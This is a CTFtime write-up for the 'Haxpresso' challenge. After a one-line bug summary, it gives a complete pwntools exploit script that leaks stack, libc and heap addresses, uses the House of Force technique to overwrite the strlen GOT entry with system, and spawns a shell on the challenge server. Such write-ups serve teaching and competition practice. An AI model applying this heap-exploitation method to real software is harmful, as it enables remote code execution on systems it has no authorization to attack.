CTFtime.org

Haxpresso

by feignix / InfoSecIITR

Rating:

Vuln: Input not null terminated. Address leaks through stack data copied over to heap along with input. Followed by House of Force.
Script:
```
from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw' , '-h']

#p = process('haxpresso')
p = remote('52.30.206.11', 1337)
b = ELF('./haxpresso')
l = ELF('./libc.so')

"""
gdb.attach(p, '''
b *0x8048dfd

''')
"""

def add_order(drink, add_name='n', name=""):
p.sendline('1')
p.recvuntil('drink: ')
p.sendline(str(drink))
p.recvuntil("(y/n): ")
p.sendline(add_name)
if add_name=='y':
p.recvuntil("name: ")
p.send(name)
return p.recvuntil("> ")

def edit_order(idx, name):
p.sendline('4')
p.recvuntil('edit: ')
p.sendline(str(idx))
p.recvuntil('order: ')
p.send(name)
return p.recvuntil("> ")

def rem_order(idx):
p.sendline('2')
p.recvuntil('remove: ')
p.sendline(str(idx))
return p.recvuntil("> ")

def checkout(idx, new, finish_yn, change_yn='n'):
p.sendline('3')
o = ""
if not new:
o = p.recvuntil('(y/n): ')
p.sendline(change_yn)
if change_yn=='y':
p.recvuntil('id: ')
p.sendline(str(idx))
else:
p.recvuntil('(y/n): ')
p.sendline(finish_yn)
o+=p.recvuntil('> ')
return o
p.recvuntil('id: ')
p.sendline(str(idx))
p.recvuntil('(y/n): ')
p.sendline(finish_yn)
o+=p.recvuntil('> ')
return o

def update_firmware(size, data, note):
p.sendline('0')
p.recvuntil('size: ')
p.sendline(str(size))
p.recvuntil('data: ')
p.send(data)
p.recvuntil('note: ')
p.send(note)
p.interactive()

add_order(1, add_name='y', name="A") #0
checkout(0, True, 'n')
leak = checkout(0, False, 'y').split('\n')[4].replace('Name: A', '')
stackaddr = u32(leak[7:11])
log.info("Stack addr: " + hex(stackaddr))
libcaddr = u32("\x00" + leak[0:3])
libcbase = libcaddr + (0xf7de9000-0xf7df6600)
log.info("Libc addr: " + hex(libcaddr))

add_order(1, add_name='y', name="\n"*72+ "\x00") #1
payload = ""
payload += "\x00"*(72-len(payload))
edit_order(1, payload)

add_order(1, add_name='y', name="BBBB\x00") #2
add_order(1, add_name='y', name="CCCC\x00") #3

edit_order(2, "X"*28)

checkout(2, True, 'n')
heapaddr = u32(checkout(2,False,'n').split('\n')[4].replace("Name: " + "X"*28, '')[0:4])
log.info("Heap addr: " + hex(heapaddr))

top = heapaddr + 0x8

log.info("Stack addr: " + hex(stackaddr))
log.info("Heap addr: " + hex(heapaddr))
log.info("Libc addr: " + hex(libcbase))
log.info("Top: " + hex(top))

edit_order(2, "X"*52 + p32(0xffffffff))

victim = b.symbols.got['strlen']-0x8
offset = victim - top -0x8

got = p32(libcbase + l.symbols['system'])

update_firmware(offset, "/bin/sh\x00", got)
p.interactive()
```

Comments